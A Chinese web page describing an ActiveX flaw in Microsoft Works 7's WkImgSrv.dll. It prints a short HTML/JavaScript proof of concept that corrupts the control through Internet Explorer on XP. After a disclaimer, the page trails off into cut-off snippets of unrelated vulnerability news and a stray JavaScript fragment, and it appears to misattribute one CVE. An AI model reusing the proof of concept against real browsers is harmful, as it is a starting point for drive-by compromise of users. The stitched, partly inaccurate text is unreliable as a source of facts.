时间:2021-05-25
近几天网络上流传着一个传说为IE0DAY的POC代码,在XP系统环境下通杀了IE6和IE7,其它系统并未经过测试。其实这个漏洞并不是存在于IE,而是Microsoft Works的组件被挖掘出漏洞,部分的XP预装了Microsoft Works,所以就出现了过全补丁系统的漏洞(如华硕易PC 就预装了Microsoft Works)。
影响的DLL版本:Microsoft Works 7 WkImgSrv.dll (7.03.0616.0) 以下为crash POC <html>
<head>
<title>Microsoft Works 7 WkImgSrv.dll crash POC</title>
<script language=”JavaScript”>
function payload() {
var num = -1;
obj.WksPictureInterface = num;
}
</script>
</head>
<body onload=”JavaScript: return payload();”>
<object classid=”clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6″ id=”obj”>
</object>
</body>
</html>
声明:本页内容来源网络,仅供用户参考;我单位不保证亦不表示资料全面及准确无误,也不保证亦不表示这些资料为最新信息,如因任何原因,本网内容或者用户因倚赖本网内容造成任何损失或损害,我单位将不会负任何法律责任。如涉及版权问题,请提交至online#300.cn邮箱联系删除。
日前有安全机构曝光了IE浏览器的一个0day漏洞,利用这个0day漏洞(CVE-2012-4681)攻击者可以绕过Windows的ASLR(地址空间布局随机化)
据国外媒体报道,微软IE浏览器再曝新0day漏洞,该漏洞可能会导致用户电脑成肉鸡。安全专家预估,此漏洞一旦被利用,影响或超IE极光漏洞。IE6和IE7存在一处缺
复制代码代码如下:functionMsToDuration(ms){varsec=0,min=0,hour=0,day=0,dur={};if(ms>0){//
金山毒霸安全实验室5月7日对外表示,金山毒霸安全实验室研究人员进行例行漏洞检查过程中,发现QQ旋风存在一鲜为人知的缓冲区溢出0day漏洞,攻击者可以利用该漏洞制
4月16日,微信PC版客户端被曝存在一个高危等级的在野0day漏洞。黑客只需要通过微信发送一个特制web链接,用户一旦点击链接,微信PC(windows)版进程